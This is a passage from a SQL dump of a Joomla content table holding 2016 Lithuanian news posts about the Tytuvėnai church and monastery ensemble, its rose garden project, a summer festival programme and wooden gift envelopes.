zenklai.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,112,'','',1,3210,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(268,356,'Vienuolyno ansamblyje pražys rožių sodas','tytuvenu-baznycios-ir-vienuolyno-ansamblyje-prazys-roziu-sodas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų bažnyčios ir vienuolyno sodas šiandien toks ramus, vienišas ir liūdnas. Tokį sodą matote paskutinį kartą. Jau šį savaitgalį jame pradės skleistis pirmieji nuostabių rožių, nuostabūs žiedai. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/roziu_sodas{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų piligrimų centras kartu su Tytuvėnų parapija planuoja buvusiame vienuolių sode padaryti rožių sodą.<br />Mieli tytuvėniškiai, Tytuvėnų miestelio lankytojai, jei jus ši idėja sudomino ir norite prisijungti prie šio rožių sodo įkūrimo, mes kviečiame pasisodinti savo šeimos rožę Tytuvėnų bažnyčios ir vienuolyno ansamblio būsimame rožyne.<br /></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šiuo metu dėl rožių sodo įkūrimo dirba kraštovaizdžio specialistai, kurie pateiks vizualinę medžiagą būsimo rožyno. Turėdami vizualinius sprendimus, mes jais pasidalinsime su visais mūsų ansamblio mylėtojais.<br /></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Dėl platesnės informacijos prašome kreiptis į VšĮ \"Tytuvėnų piligrimų centras\" direktorę Astą Vaitkevičiūtę-Kizienę telefonu 8 674 97392, elektroniniu paštu info@infotytuvenai.lt arba atvykus į mūsų nuostabų Tytuvėnų bažnyčios ir vienuolyno ansamblį.<br /></span></span></span></p>',1,0,0,44,'2016-05-25 20:27:00',135,'','2016-05-25 20:28:41',135,0,'0000-00-00 00:00:00','2016-05-25 20:27:00','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/roziu_sodas\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,111,'','',1,3353,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','');
INSERT INTO `xyhmu_content` VALUES (269,357,'Tytuvėnų vasaros festivalis 2016','tytuvenu-vasaros-festivalis-2016','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tarptautinio Tytuvėnų vasaros festivalio 2016 programa.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/tvf2016/virsus.jpg\" border=\"0\" alt=\"\" /> <br /> <img src=\"images/stories/naujienos/tvf2016/birzelis.jpg\" border=\"0\" alt=\"\" /> <br /> <img src=\"images/stories/naujienos/tvf2016/liepa.jpg\" border=\"0\" alt=\"\" /> <br /> <img src=\"images/stories/naujienos/tvf2016/liepa1.jpg\" border=\"0\" alt=\"\" /> <br /> <img src=\"images/stories/naujienos/tvf2016/liepa2.jpg\" border=\"0\" alt=\"\" /> <br /> <img src=\"images/stories/naujienos/tvf2016/rugpjutis.jpg\" border=\"0\" alt=\"\" /> <br /> <img src=\"images/stories/naujienos/tvf2016/apacia.jpg\" border=\"0\" alt=\"\" /> </span></p>',1,0,0,44,'2016-06-04 09:18:25',135,'','2016-06-04 09:19:09',135,135,'2016-06-04 09:19:09','2016-06-04 09:18:25','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/tvf2016\\/logo.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,110,'','',1,3589,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(270,358,'Mediniai dovanų vokeliai','mediniai-dovanu-vokeliai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Mediniai dovanų vokeliai skirti įvairioms progoms.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/dovanu_vokeliai{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šie vokeliai įtiks netik rimtiems, bet ir gerą humoro jausmą turintiems žmonėms. Medinius dovanų vokelius galite įsigyti Tytuvėnų vienuolyne.</span></span></span></p>',1,0,0,44,'2016-06-20 05:07:19',135,'','2016-06-20 05:07:59',135,0,'0000-00-00 00:00:00','2016-06-20 05:07:19','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/dovanu_vokeliai\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,109,'','',1,3081,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(271,359,'Rožių sodas','roziu-sodas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Norime pasidžiaugti, kad mūsų idėja turėti rožių sodą mažais žingsneliais eina į priekį. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/roziu_sodas1{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Esame labai dėkingi jaunavedžiams, kurie nepabūgo būti pirmieji ir pasodino savo šeimos rožes. Patys pirmieji buvo Austėja ir Dovydas, tačiau nesulaukėme jų nuotraukos su rožės sodinimo akimirkomis, tai tenka įkelti nuotrauką be jaunavedžių. Antrieji buvo Inga ir Martynas, kurie noriai fotografavosi ir mėgavosi akimirka. Ačiū Jums, mieli jaunavedžiai!</span></span></span></p>',1,0,0,44,'2016-06-20 05:17:45',135,'','2016-06-20 05:18:30',135,0,'0000-00-00 00:00:00','2016-06-20 05:17:45','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/roziu_sodas1\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,108,'','',1,3610,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(272,361,'Rožių sodo planas','tytuvenu-baznycios-ir-vienuolyno-ansamblio-roziu-sodo-planas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Prasidėjo pirmadienis, prasidėjo nauja savaitė, prasidėjo nauji darbai. Norime Jums pristatyti Tytuvėnų bažnyčios ir vienuolyno ansamblio ansamblio rožių sodo vizualinį planą. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      